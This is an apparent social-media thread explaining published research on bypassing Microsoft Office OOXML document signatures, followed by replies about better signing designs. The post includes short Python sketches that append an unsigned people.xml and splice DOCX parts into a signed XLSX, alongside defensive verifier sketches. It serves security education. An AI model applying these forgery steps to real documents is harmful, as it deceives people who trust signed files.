I don't so much care about OOXML signatures per se (maybe there's some European government that relies on them, but I've never seen a signed .DOCX in real life), but this paper is super useful just as a record of how to test a signature system.

https://www.usenix.org/conference/usenixsecurity23/presentation/rohlmann

Every Signature is Broken: On the Insecurity of Microsoft Office’s OOXML Signatures | USENIX

You're a vulnerability researcher and somebody drops OOXML signatures in your lap and asks "do these things work?"

Well, what does "work" mean? Here, it means "everything the renderer displays to a doc viewer today was knowingly signed by the authority who signed it yesterday". That's a hard problem! Much harder than signing a .deb package.

So the first thing the researcher does is go figure out how OOXML works in the first place. Surprise, it's a nightmare! 40 years of stratified features dating back to Multi-Tool Word for Xenix. The first 3 weeks of your project are probably just reading the spec.

You come to learn that an OOXML .DOCX is a ZIP archive with what appear to be three different manifests inside, because why not. They are:

1. [Content_Types.xml], mapping filenames to content types; any file in the bundle not in this manifest will trigger an error.

2. document.xml.rels, mapping filenames to symbolic IDs, which are referenced from documents themselves.

3. The "Package Info" section of "sig1.xml", the signature block, which maps files to hashes of those files.

The "index.html" of a .DOCX file is a file in the bundle called "document.xml", and that's where all rendering starts.

You can sort of spitball how you'd do a signing scheme for this system; maybe it doesn't have to be complicated at all. Just reject signatures for any .DOCX bundle that includes a file not in the "Package Info" section.
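That spitballed rule is easy to state in code. Here's a toy sketch of such a strict verifier (the function name, and the idea of passing Package Info around as a plain dict of hashes, are my inventions, not Word's actual machinery):

```python
import hashlib
import zipfile

def verify_strict(docx, package_info):
    """Toy strict verifier: every file in the bundle must appear in the
    signed Package Info manifest, and every listed hash must match.
    `package_info` is a dict {filename: sha256 hexdigest} assumed to be
    covered by the signature."""
    with zipfile.ZipFile(docx) as z:
        names = set(z.namelist())
        # Reject any file the signer never saw.
        if names - set(package_info):
            return False
        # Reject any missing or tampered file.
        for name, expected in package_info.items():
            if name not in names:
                return False
            if hashlib.sha256(z.read(name)).hexdigest() != expected:
                return False
    return True
```

Under this rule, adding any file at all to the bundle breaks verification, which kills most of the attacks below before they start.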

But there's this paper, so you know that's not what they did.

So, [Content_Types.xml] isn't signed at all. You can add and remove files in a .DOCX bundle without breaking the signature.

But that doesn't necessarily matter, right? Those are just files in a ZIP file. What matters is whether files get pulled in by the rendering process. You imagine the designers of this format starting with an axiom like "if it's referenced by document.xml, it has to be signed". More on that in a sec.

The bigger problem is how “document.xml.rels” is signed. Remember, this is the mapping of symbolic IDs to filenames in the bundle; it's what the renderer consults when following links between files in the bundle; it's the routing table of a .DOCX.

Instead of signing "document.xml.rels", the signer parses it, and adds the hash of each referenced file to the "Package Info" manifest. The ".rels" file itself: not signed.

This is a mystifying decision.
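To see what that decision gives an attacker, here's a toy model of the signer as described (names and data shapes are mine, hypothetical): it hashes the *targets* of the relationships, but never the routing table itself.

```python
import hashlib

def package_info_hashes(bundle, rels):
    """Toy model of the signer: hash every file that the .rels routing
    table points at, but not the .rels mapping itself.
    `bundle` maps filenames to bytes; `rels` maps relationship IDs to
    filenames."""
    return {name: hashlib.sha256(bundle[name]).hexdigest()
            for name in rels.values()}
```

The consequence: two bundles whose routing tables wire the same files to completely different IDs produce byte-identical Package Info sections, so re-routing references is invisible to the signature.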

So you're the researcher and you're researching this blob of goo. Where do you start? Well, one good place would be: are there files _besides_ "document.xml" that get automatically rendered by Word?

Turns out: yes. If it exists, "people.xml", which is information about the authors of the file, will get rendered. The rendering instructions in that file, like anything else in a .DOCX, can effectively take over the whole document window.

So, a trivial attack: take any signed .DOCX without a "people.xml", and add a "people.xml" that rewrites the document. Game over.
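The whole attack is a ZIP append. A sketch (the payload path and function name are mine; the point is only that no signed byte gets touched):

```python
import io
import zipfile

def add_people_xml(signed_docx_bytes, payload):
    """Toy version of the attack: append a people.xml to an
    already-signed bundle. Nothing that was signed is modified, so a
    verifier that only checks the hashes listed in Package Info still
    passes."""
    buf = io.BytesIO(signed_docx_bytes)
    with zipfile.ZipFile(buf, "a") as z:
        z.writestr("word/people.xml", payload)
    return buf.getvalue()
```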

Next, you might look for rendering semantics that aren't directly expressed in the .DOCX bundle, but are carried implicitly in Word's code. References between files are explicit --- they're encoded in the .rels file. But what about things like fonts and styles?

Styles in a .DOCX are recorded in "styles.xml". So, a slightly more complicated attack: get a benign .DOCX signed without a "styles.xml", then add a "styles.xml" that drastically changes what gets shown to a viewer or printer.

A similar attack exists for fonts, which seems like it was fun to come up with but must be much less useful than the styles thing.

Your goal as an attacker is to get malicious content onto the screen or a printed page. There's blood in the water now: it seems apparent that the signature scheme designers were given documentation on how .DOCX files work, and little else. So what else do the 50 million lines of code in Word do that might surprise the .DOCX verifier?

Document repair!

Take a validly-signed .XLSX (I'm sure one exists somewhere). Now, add the files from your malicious .DOCX into the bundle. Rename the file to a ".DOCX". Open it in Word.

Word will offer to "repair" it (because XLSX files sprouting DOCX files and vice versa is apparently common enough for there to be a feature for this) and then render the malicious .DOCX as if it were signed.
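Mechanically, the splice is again just ZIP surgery; none of the signed parts get touched. A toy sketch (function name and file layout are mine, and the "repair" step itself is Word's behavior as the paper describes it, not something this code does):

```python
import io
import zipfile

def splice(signed_xlsx, malicious_docx):
    """Toy model of the repair attack: copy the attacker's .DOCX parts
    into a validly-signed .XLSX bundle, leaving every signed part
    intact. Per the paper, Word then offers to "repair" the renamed
    file and renders the DOCX content while the XLSX signature still
    verifies."""
    out = io.BytesIO(signed_xlsx)
    with zipfile.ZipFile(io.BytesIO(malicious_docx)) as src, \
         zipfile.ZipFile(out, "a") as dst:
        existing = set(dst.namelist())
        for name in src.namelist():
            if name not in existing:  # don't clobber the signed parts
                dst.writestr(name, src.read(name))
    return out.getvalue()  # attacker renames the result to .docx
```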

There's a similar attack that I barely have my head around involving support for legacy .DOC files. You can get a .DOC signed, then scrape its signature out and splice it into a .DOCX file; add the .DOC components to the .DOCX bundle as files. The renderer will validate the .DOC signature, but display the .DOCX contents.

To me all of these attacks are variations on the same basic theme:

1. Find whatever flexibilities the signature format gives you; all the ways in which the signed object is malleable.

2. Look for implicit rules for interpreting/executing/rendering the signed object; behaviors that aren't directly recorded in signed metadata.

More attacks. Let's start simple. Does the signature verification code work?

Not on macOS. On macOS, apparently, the mere presence of a "sig1.xml" signature file is enough to get the renderer to say the file is signed properly, even if it's empty.

OK, but that's macOS. Nobody takes macOS seriously. Did they at least, like, unit test this thing?

These are XML signatures --- never sign XML --- and so each semantic object that's signed is an independent "reference", even within the same file. So, let's try something simple: can we provide a signature that doesn't reference _anything_?

Indeed we can! Semantically, a "sig1.xml" signature includes a reference to the "Package Info" manifest, from which we get all the hashes parsed from "document.xml.rels". That's the heart of the document signature.

But because XML, we can create a signature block that doesn't include a reference to the "Package Info" manifest. It "verifies" --- there's nothing really to verify but itself --- and Word renders the resulting content as if everything was signed. You can use a random SAML token instead of a .DOCX signature, and it works.
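Word's real pipeline is XML-DSig and far hairier, but the logic flaw reduces to something like this toy: the verifier checks every reference it finds, and never insists that the one reference that matters is present.

```python
import hashlib

def verify_references(bundle, references):
    """Toy model of the flaw: check each (filename, expected-hash)
    reference in the signature, but never require that the Package Info
    reference exists. An empty reference list passes vacuously."""
    for name, expected in references:
        if hashlib.sha256(bundle.get(name, b"")).hexdigest() != expected:
            return False
    return True  # "verified" --- even though nothing was checked
```

With `references=[]`, the loop body never runs and any bundle at all "verifies".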

I can't say loudly enough how much all of these attacks are enabled by XML. There is nothing in the universe worse to sign than an XML document, except, maybe, a .ZIP file bundle of XML documents linked together by another XML document.
BY THE WAY if any of you know any of these Ruhr weirdos, tell them we'd love to bug them with questions on the SCW podcast.
or are they Bochum weirdos? This is the level of discourse they'd have to put up with if they talk to us. But they should do it for the good of the discourse.
@tqbf unless they're actually ruhr water dwellers, i'd opt for bochum.
@tqbf the uni is officially abbreviated RUB, if that helps? :) you should reach out to Christian directly https://informatik.rub.de/nds/people/mainka/
Dr.-Ing. Christian Mainka – Fakultät für Informatik – Ruhr-Universität Bochum

@tqbf forwarded to an undefined group of people from Bochum 👻
@tqbf Sent this toot to one of the authors, looking forward to an episode with them!
@tqbf so what I'm hearing is you have a new proposal for the DNSSEC protocol?

@tqbf as a complete novice to this space, what would be a better way to do this kind of thing, assuming you can only distribute a single file?

Zip everything together, sign the bundle, and wrap the sig + bundle in another zip?

@zrail Bunch of different ways to do that; if you can't change the bundle archive format, you could still include a hash of the enclosing bundle in the manifest.

I might look for some kind of DOM-style object to sign instead of the raw XML.

The authors suggest just fully signing document.xml.rels, which still leaves a lot of flexibility to an attacker.

@zrail @tqbf Hash every file in the ZIP, sign the hashes and put the result in ZIP comment?
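That ZIP-comment scheme fits in a few lines. A sketch, with HMAC standing in for a real public-key signature (the function names and the `|`-delimited comment layout are made up for illustration):

```python
import hashlib
import hmac
import io
import json
import zipfile

KEY = b"demo-key"  # stand-in: a real design would use a public-key signature

def seal(zip_bytes):
    """Hash every file, sign the manifest, and stash manifest + tag in
    the ZIP's comment field, which lives outside the file entries."""
    manifest = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for name in z.namelist():
            manifest[name] = hashlib.sha256(z.read(name)).hexdigest()
    blob = json.dumps(manifest, sort_keys=True).encode()
    tag = hmac.new(KEY, blob, hashlib.sha256).hexdigest().encode()
    out = io.BytesIO(zip_bytes)
    with zipfile.ZipFile(out, "a") as z:
        z.comment = blob + b"|" + tag
    return out.getvalue()

def check(zip_bytes):
    """Verify the tag, then require the file set to match the manifest
    exactly --- added or removed files fail, not just modified ones."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        blob, _, tag = z.comment.rpartition(b"|")
        want = hmac.new(KEY, blob, hashlib.sha256).hexdigest().encode()
        if not hmac.compare_digest(want, tag):
            return False
        manifest = json.loads(blob)
        names = set(z.namelist())
        if names != set(manifest):
            return False
        return all(hashlib.sha256(z.read(n)).hexdigest() == manifest[n]
                   for n in names)
```

The exact-file-set check is the part Office's scheme skipped, and it's what makes the people.xml/styles.xml tricks fail here.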

@zrail @tqbf In my opinion, that's pretty much the "right" approach. As Thomas said, much of this nonsense is enabled by XML, and the only way to get rid of XML is to ignore it by treating the document as a binary blob. (I remember reading papers by Peter Gutmann, who said much the same thing at least 20 years ago.)

As an example to show how signature-unfriendly XML is, consider that whitespace may not matter in certain situations. E.g., <a><b></b></a> may be the "same" document as <a> <b> </b> </a> (with spaces). So before you can start signing your document (or start verifying a signature), you have to transform it into a "canonical" form. According to Peter Gutmann (IIRC), one book on XML signatures spends half of its pages on describing canonicalisation.

And that's not even considering encodings, namespaces, external entities, or all the other things that make XML so hard to get completely right.
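The whitespace point is easy to demonstrate with the stdlib's own C14N support (Python 3.8+; `strip_text` is one canonicalization policy choice among several, which is exactly the problem):

```python
import hashlib
from xml.etree.ElementTree import canonicalize  # stdlib W3C C14N, Python 3.8+

a = "<a><b></b></a>"
b = "<a> <b/> </a>"   # the "same" document: empty-tag syntax + whitespace

# The raw bytes hash differently, so a naive signature over them breaks:
assert hashlib.sha256(a.encode()).digest() != hashlib.sha256(b.encode()).digest()

# After canonicalization (here also stripping whitespace-only text),
# both reduce to the same byte string, which is what actually gets signed:
ca = canonicalize(a, strip_text=True)
cb = canonicalize(b, strip_text=True)
assert ca == cb == "<a><b></b></a>"
```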

@tqbf Thank you very much for this overview of the findings and especially the summary of practical learnings, Thomas!

@tqbf I am now thinking of what signing a LaTeX file would be like. LaTeX is notoriously bad at managing the versions of the style and class files to be used.

I have decided that I don’t want to think about it anymore. Thirty seconds of thought has frightened me away.

@tqbf as someone who actually needs to digitally sign documents on a regular basis, I'm left wondering if it's better or worse that the usual solution is to convert to PDF, then use Acrobat to create a visible signature.
@tqbf sounds like the security of these things hinges on document forgery being a crime, rather than on cryptography.
@tqbf if you’re having word problems, I feel bad for you son. I got 99 problems…